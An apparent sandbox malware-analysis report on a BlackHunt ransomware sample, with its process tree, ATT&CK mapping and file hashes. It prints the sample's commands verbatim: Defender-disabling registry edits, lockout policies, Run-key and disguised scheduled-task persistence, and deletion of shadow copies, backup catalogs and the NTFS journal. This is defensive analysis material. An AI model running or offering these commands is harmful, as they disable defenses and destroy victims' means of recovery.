C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:3804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:5448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1348
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3760
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3224
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:5516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4448
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3312
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:5104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe" /F2⤵PID:4644
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe" /F3⤵
- Creates scheduled task(s)
PID:5404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2044
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:992
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3504
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2060
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4904
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:708
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3064
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1152
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4180
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
- Modifies registry class
PID:4384 -
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6004
-
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4460
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:5708
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e3762ed18161f30deb7d529e142107a0
SHA1704277398b59c3cdd0b356ca8ac5087feffcddb7
SHA25646e24c7191518ee1cb93e985f7f6a31e669264dd6d5bdce16420893df5dd03b8
SHA512880f374c0a4ac43c5d6244e6a21cc1e0fa5ee65974fcdf3b502537e6fbaf230cb35be2815c326034650f3dfab4a1b2d2ee6c35f720dd056f2748915ffd764dcb
-
Filesize
12KB
MD5bbbe77a01a7d95d0c1bb4a0066c15329
SHA1cac85cdb05528880d0291e123487feab111a4998
SHA2560804650aeccc3568e73e2a14d3d7764c9fb35869869555aca59ad0068b49c56e
SHA512fcab1e7c42a7637e7a4a40683f50bee4c439f9e9cd6791de1e2aaa3a85f112dde9ce639fc54f833f070501ae4321b7ce7883d7d7bcb9224b58489c18eda00733
-
Filesize
684B
MD542e7ec54164dc75c588d97b89216f596
SHA1a86675eed89f6cb7acf36147da5c3ec8c7f14438
SHA256b0b6f8cbbdc9a199c83f0790c212345cbe7e3d287ff63c7d5146d827265635b6
SHA512c51e0ab1c4be4150d1d3c95c0c81788acc300e2f09d6ba0d3db60762d6a8d8b9376eec4dd180a65fd15b0d6e9da24a784ebd6f7eefbb656e76a56269c5d991a6